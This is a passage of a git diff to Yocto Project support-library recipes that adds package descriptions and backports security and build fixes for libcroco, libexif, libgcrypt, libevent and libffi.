+@@ -1212,7 +1226,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ *We consider parameter as being an "any*" production.
+ */
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1237,7 +1251,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1265,7 +1279,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index 9171a9de5c..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
+DESCRIPTION = "The Libcroco project is an effort to build a generic \
+Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
+used by GNOME applications in need of CSS support."
HOMEPAGE = "http://www.gnome.org/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -18,3 +21,6 @@ inherit gnomebase gtk-doc binconfig-disabled
SRC_URI[archive.md5sum] = "c80c5a8385011a0260dce6bd0da93dce"
SRC_URI[archive.sha256sum] = "767ec234ae7aa684695b3a735548224888132e063f92db585759b422570621d4"
+
+SRC_URI +="file://CVE-2020-12825.patch \
+"
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
+DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
+facilities for logging and a signal handler to enable graceful shutdown, \
+as well as file locking to ensure that only a single copy of a given daemon \
+is running at a time."
SECTION = "libs"
AUTHOR = "Lennart Poettering <lennart@poettering.net>"
HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
RP 2020/2/7
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Pending
+Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
+Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
Index: a/libevdev/make-event-names.py
===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Wrapper library for evdev devices"
+DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
+the evdev ioctls through type-safe interfaces and provides functions \
+to change the appearance of the device."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
SECTION = "libs"
diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
+From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
+From: Yi Fan Yu <yifan.yu@windriver.com>
+Date: Thu, 22 Apr 2021 22:35:59 -0400
+Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
+ 100 ms
+
+The default timeout tolerance is 50 ms,
+which causes intermittent failure in many the
+related tests in arm64 QEMU.
+
+See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
+(The root cause seems to be a heavy load)
+
+Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
+---
+ test/regress.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/test/regress.h b/test/regress.h
+index f06a7669..829af4a7 100644
+--- a/test/regress.h
++++ b/test/regress.h
+@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
+ tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
+
+ #define test_timeval_diff_eq(tv1, tv2, diff) \
+- test_timeval_diff_leq((tv1), (tv2), (diff), 50)
++ test_timeval_diff_leq((tv1), (tv2), (diff), 100)
+
+ long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
+
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
SUMMARY = "An asynchronous event notification library"
+DESCRIPTION = "A software library that provides asynchronous event \
+notification. The libevent API provides a mechanism to execute a callback \
+function when a specific event occurs on a file descriptor or after a \
+timeout has been reached. libevent also supports callbacks triggered \
+by signals and regular timeouts"
HOMEPAGE = "http://libevent.org/"
BUGTRACKER = "https://github.com/libevent/libevent/issues"
SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
file://Makefile-missing-test-dir.patch \
file://run-ptest \
file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
+ file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
"
SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0198.patch b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
new file mode 100644
index 0000000000..2a48844cb2
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
@@ -0,0 +1,66 @@
+From ca71eda33fe8421f98fbe20eb4392473357c1c43 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:22:47 +0800
+Subject: [PATCH] fixed another unsigned integer overflow
+
+first fixed by google in android fork,
+https://android.googlesource.com/platform/external/libexif/+/1e187b62682ffab5003c702657d6d725b4278f16%5E%21/#F0
+
+(use a more generic overflow check method, also check second overflow instance.)
+
+https://security-tracker.debian.org/tracker/CVE-2020-0198
+
+Upstream-Status: Backport[https://github.com/libexif/libexif/commit/ce03ad7ef4e8aeefce79192bf5b6f69fae396f0c]
+CVE: CVE-2020-0198
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-data.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/libexif/exif-data.c b/libexif/exif-data.c
+index 8b280d3..34d58fc 100644
+--- a/libexif/exif-data.c
++++ b/libexif/exif-data.c
+@@ -47,6 +47,8 @@
+ #undef JPEG_MARKER_APP1
+ #define JPEG_MARKER_APP1 0xe1
+
++#define CHECKOVERFLOW(offset,datasize,structsize) (( offset >= datasize) || (structsize > datasize) || (offset > datasize - structsize ))
++
+ static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
+
+ struct _ExifDataPrivate
+@@ -327,7 +329,7 @@ exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
+ return;
+ }
+- if (s > ds - o) {
++ if (CHECKOVERFLOW(o,ds,s)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
+ return;
+ }
+@@ -420,9 +422,9 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ }
+
+ /* Read the number of entries */
+- if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
++ if (CHECKOVERFLOW(offset, ds, 2)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
+- "Tag data past end of buffer (%u > %u)", offset+2, ds);
++ "Tag data past end of buffer (%u+2 > %u)", offset, ds);
+ return;
+ }
+ n = exif_get_short (d + offset, data->priv->order);
+@@ -431,7 +433,7 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ offset += 2;
+
+ /* Check if we have enough data. */
+- if (offset + 12 * n > ds) {
++ if (CHECKOVERFLOW(offset, ds, 12*n)) {
+ n = (ds - offset) / 12;
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
+ "Short data; only loading %hu entries...", n);
+--
+2.17.1
+
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0452.patch b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
new file mode 100644
index 0000000000..a117b8b369
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
@@ -0,0 +1,39 @@
+From 302acd49eba0a125b0f20692df6abc6f7f7ca53e Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:18:51 +0800
+Subject: [PATCH] fixed a incorrect overflow check that could be optimized
+ away.
+
+inspired by:
+https://android.googlesource.com/platform/external/libexif/+/8e7345f3bc0bad06ac369d6cbc1124c8ceaf7d4b
+
+https://source.android.com/security/bulletin/2020-11-01
+
+CVE-2020-0452
+
+Upsteam-Status: Backport[https://github.com/libexif/libexif/commit/9266d14b5ca4e29b970fa03272318e5f99386e06]
+CVE: CVE-2020-0452
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-entry.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libexif/exif-entry.c b/libexif/exif-entry.c
+index 5de215f..3a6ce84 100644
+--- a/libexif/exif-entry.c
++++ b/libexif/exif-entry.c
+@@ -1371,8 +1371,8 @@ exif_entry_get_value (ExifEntry *e, char *val, unsigned int maxlen)
+ {
+ unsigned char *utf16;
+
+- /* Sanity check the size to prevent overflow */
+- if (e->size+sizeof(uint16_t)+1 < e->size) break;
++ /* Sanity check the size to prevent overflow. Note EXIF files are 64kb at most. */
++ if (e->size >= 65536 - sizeof(uint16_t)*2) break;
+
+ /* The tag may not be U+0000-terminated , so make a local
+ U+0000-terminated copy before converting it */
+--
+2.17.1
+
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index a520d5c9f9..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
+DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
+intended to replace lots of redundant implementations in command-line \
+utilities and programs with GUIs."
HOMEPAGE = "https://libexif.github.io/"
SECTION = "libs"
LICENSE = "LGPLv2.1"
@@ -8,6 +11,8 @@ def version_underscore(v):
return "_".join(v.split("."))
SRC_URI = "https://github.com/libexif/libexif/releases/download/libexif-${@version_underscore("${PV}")}-release/libexif-${PV}.tar.xz \
+ file://CVE-2020-0198.patch \
+ file://CVE-2020-0452.patch \
"
SRC_URI[sha256sum] = "5048f1c8fc509cc636c2f97f4b40c293338b6041a5652082d5ee2cf54b530c56"
diff --git a/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
new file mode 100644
index 0000000000..782dce70d8
--- /dev/null
+++ b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
@@ -0,0 +1,104 @@
+From 501a6b55853af549fae72723e74271f2a4ec7cf6 Mon Sep 17 00:00:00 2001
+From: Brett Warren <brett.warren@arm.com>
+Date: Fri, 27 Nov 2020 15:28:42 +0000
+Subject: [PATCH] arm/sysv: reverted clang VFP mitigation
+
+Since commit e3d2812ce43940aacae5bab2d0e965278cb1e7ea,
+seperate instructions were used when compiling under clang,
+as clang didn't allow the directives at the time. This mitigation
+now causes compilation to fail under clang 10, as described by
+https://github.com/libffi/libffi/issues/607. Now that
+clang supports the LDC and SDC instructions, this mitigation
+has been reverted.
+
+Upstream-Status: Pending
+Signed-off-by: Brett Warren <brett.warren@arm.com>
+---
+ src/arm/sysv.S | 33 ---------------------------------
+ 1 file changed, 33 deletions(-)
+
+diff --git a/src/arm/sysv.S b/src/arm/sysv.S
+index 63180a4..e3ce526 100644
+--- a/src/arm/sysv.S
++++ b/src/arm/sysv.S
+@@ -128,13 +128,8 @@ ARM_FUNC_START(ffi_call_VFP)
+ cfi_startproc
+
+ cmp r3, #3 @ load only d0 if possible
+-#ifdef __clang__
+- vldrle d0, [sp]
+- vldmgt sp, {d0-d7}
+-#else
+ ldcle p11, cr0, [r0] @ vldrle d0, [sp]
+ ldcgt p11, cr0, [r0], {16} @ vldmgt sp, {d0-d7}
+-#endif
+ add r0, r0, #64 @ discard the vfp register args
+ /* FALLTHRU */
+ ARM_FUNC_END(ffi_call_VFP)
+@@ -172,25 +167,13 @@ ARM_FUNC_START(ffi_call_SYSV)
+ nop
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vstr s0, [r2]
+-#else
+ stc p10, cr0, [r2] @ vstr s0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vstr d0, [r2]
+-#else
+ stc p11, cr0, [r2] @ vstr d0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vstm r2, {d0-d3}
+-#else
+ stc p11, cr0, [r2], {8} @ vstm r2, {d0-d3}
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_INT64)
+ str r1, [r2, #4]
+@@ -287,11 +270,7 @@ ARM_FUNC_START(ffi_closure_VFP)
+ add ip, sp, #16
+ sub sp, sp, #64+32 @ allocate frame
+ cfi_adjust_cfa_offset(64+32)
+-#ifdef __clang__
+- vstm sp, {d0-d7}
+-#else
+ stc p11, cr0, [sp], {16} @ vstm sp, {d0-d7}
+-#endif
+ stmdb sp!, {ip,lr}
+
+ /* See above. */
+@@ -320,25 +299,13 @@ ARM_FUNC_START_LOCAL(ffi_closure_ret)
+ cfi_rel_offset(lr, 4)
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vldr s0, [r2]
+-#else
+ ldc p10, cr0, [r2] @ vldr s0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vldr d0, [r2]
+-#else
+ ldc p11, cr0, [r2] @ vldr d0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vldm r2, {d0-d3}
+-#else
+ ldc p11, cr0, [r2], {8} @ vldm r2, {d0-d3}
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_INT64)
+ ldr r1, [r2, #4]
+--
+2.17.1
+
diff --git a/meta/recipes-support/libffi/libffi_3.3.bb b/meta/recipes-support/libffi/libffi_3.3.bb
index 9dfdb9e39b..10ef003242 100644
--- a/meta/recipes-support/libffi/libffi_3.3.bb
+++ b/meta/recipes-support/libffi/libffi_3.3.bb
@@ -13,6 +13,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=492385fe22195952f5b9b197868ba268"
SRC_URI = "https://github.com/libffi/libffi/releases/download/v${PV}/${BPN}-${PV}.tar.gz \
file://not-win32.patch \
file://0001-Fixed-missed-ifndef-for-__mips_soft_float.patch \
+ file://0001-arm-sysv-reverted-clang-VFP-mitigation.patch \
file://0001-powerpc-fix-build-failure-on-power7-and-older-532.patch \
file://0001-Address-platforms-with-no-__int128.patch \
file://0001-Address-platforms-with-no-__int128-part2.patch \
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
+giving a convenient higher-level API."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2+ & LGPLv2+"
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
+From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Tue, 13 Apr 2021 10:00:00 +0900
+Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
+ too.
+
+* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
+
+--
+
+Base blinding had been introduced with USE_BLINDING. This patch add
+exponent blinding as well to mitigate side-channel attack on mpi_powm.
+
+GnuPG-bug-id: 5328
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33560
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ cipher/elgamal.c | 20 +++++++++++++++++---
+ 1 file changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..9835122f 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ static void
+ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ {
+- gcry_mpi_t t1, t2, r;
++ gcry_mpi_t t1, t2, r, r1, h;
+ unsigned int nbits = mpi_get_nbits (skey->p);
++ gcry_mpi_t x_blind;
+
+ mpi_normalize (a);
+ mpi_normalize (b);
+@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+
+ t2 = mpi_snew (nbits);
+ r = mpi_new (nbits);
++ r1 = mpi_new (nbits);
++ h = mpi_new (nbits);
++ x_blind = mpi_snew (nbits);
+
+ /* We need a random number of about the prime size. The random
+ number merely needs to be unpredictable; thus we use level 0. */
+ _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
+
++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
++ mpi_set_highbit (r1, nbits - 1);
++ mpi_sub_ui (h, skey->p, 1);
++ mpi_mul (x_blind, h, r1);
++ mpi_add (x_blind, skey->x, x_blind);
++
+ /* t1 = r^x mod p */
+- mpi_powm (t1, r, skey->x, skey->p);
++ mpi_powm (t1, r, x_blind, skey->p);
+ /* t2 = (a * r)^-x mod p */
+ mpi_mulm (t2, a, r, skey->p);
+- mpi_powm (t2, t2, skey->x, skey->p);
++ mpi_powm (t2, t2, x_blind, skey->p);
+ mpi_invm (t2, t2, skey->p);
+ /* t1 = (t1 * t2) mod p*/
+ mpi_mulm (t1, t1, t2, skey->p);
+
++ mpi_free (x_blind);
++ mpi_free (h);
++ mpi_free (r1);
+ mpi_free (r);
+ mpi_free (t2);
+
+--
+2.11.0
+
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
+From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Fri, 21 May 2021 11:15:07 +0900
+Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
+
+* cipher/elgamal.c (gen_k): Remove support of smaller K.
+(do_encrypt): Never use smaller K.
+(sign): Folllow the change of gen_k.
+
+--
+
+Cherry-pick master commit of:
+ 632d80ef30e13de6926d503aa697f92b5dbfbc5e
+
+This change basically reverts encryption changes in two commits:
+
+ 74386120dad6b3da62db37f7044267c8ef34689b
+ 78531373a342aeb847950f404343a05e36022065
+
+Use of smaller K for ephemeral key in ElGamal encryption is only good,
+when we can guarantee that recipient's key is generated by our
+implementation (or compatible).
+
+For detail, please see:
+
+ Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
+ "On the (in)security of ElGamal in OpenPGP";
+ in the proceedings of CCS'2021.
+
+CVE-id: CVE-2021-33560
+GnuPG-bug-id: 5328
+Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-40528
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+---
+ cipher/elgamal.c | 24 ++++++------------------
+ 1 file changed, 6 insertions(+), 18 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..ae7a631e 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -66,7 +66,7 @@ static const char *elg_names[] =
+
+
+ static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
+-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
++static gcry_mpi_t gen_k (gcry_mpi_t p);
+ static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
+ gcry_mpi_t **factors);
+ static int check_secret_key (ELG_secret_key *sk);
+@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
+
+ /****************
+ * Generate a random secret exponent k from prime p, so that k is
+- * relatively prime to p-1. With SMALL_K set, k will be selected for
+- * better encryption performance - this must never be used signing!
++ * relatively prime to p-1.
+ */
+ static gcry_mpi_t
+-gen_k( gcry_mpi_t p, int small_k )
++gen_k( gcry_mpi_t p )
+ {
+ gcry_mpi_t k = mpi_alloc_secure( 0 );
+ gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
+@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
+ unsigned int nbits, nbytes;
+ char *rndbuf = NULL;
+
+- if (small_k)
+- {
+- /* Using a k much lesser than p is sufficient for encryption and
+- * it greatly improves the encryption performance. We use
+- * Wiener's table and add a large safety margin. */
+- nbits = wiener_map( orig_nbits ) * 3 / 2;
+- if( nbits >= orig_nbits )
+- BUG();
+- }
+- else
+- nbits = orig_nbits;
+-
++ nbits = orig_nbits;
+
+ nbytes = (nbits+7)/8;
+ if( DBG_CIPHER )
+@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ * error code.
+ */
+
+- k = gen_k( pkey->p, 1 );
++ k = gen_k( pkey->p );
+ mpi_powm (a, pkey->g, k, pkey->p);
+
+ /* b = (y^k * input) mod p
+@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
+ *
+ */
+ mpi_sub_ui(p_1, p_1, 1);
+- k = gen_k( skey->p, 0 /* no small K ! */ );
++ k = gen_k( skey->p );
+ mpi_powm( a, skey->g, k, skey->p );
+ mpi_mul(t, skey->x, a );
+ mpi_subm(t, input, t, p_1 );
+--
+2.30.2
+
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 4e0eb0a169..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
+DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
+It can also be used independently of GnuPG, but depends on its error-reporting \
+library Libgpg-error."
HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
SECTION = "libs"
@@ -25,10 +28,15 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
file://determinism.patch \
+ file://CVE-2021-33560.patch \
+ file://CVE-2021-40528.patch \
"
SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
+# Below whitelisted CVEs are disputed and not affecting crypto libraries for any distro.
+CVE_CHECK_WHITELIST += "CVE-2018-12433 CVE-2018-12438"
+
BINCONFIG = "${bindir}/libgcrypt-config"
inherit autotools texinfo binconfig-disabled pkgconfig
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
SUMMARY = "Small library that defines common error values for all GnuPG components"
+DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
+DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
+and protocol data units. The iCalendar specification describes how \
+calendar clients can communicate with calendar servers so users can store \
+their calendar data and arrange meetings with other users. "
HOMEPAGE = "https://github.com/libical/libical"
BUGTRACKER = "https://github.com/libical/libical/issues"
LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
"
-SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \
+SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
file://0001-Makefile-cleanup-install-for-rebuilds.patch \
file://0001-Make-man-pages-reproducible.patch"
SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
+From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Wed, 5 Oct 2022 14:19:06 +0200
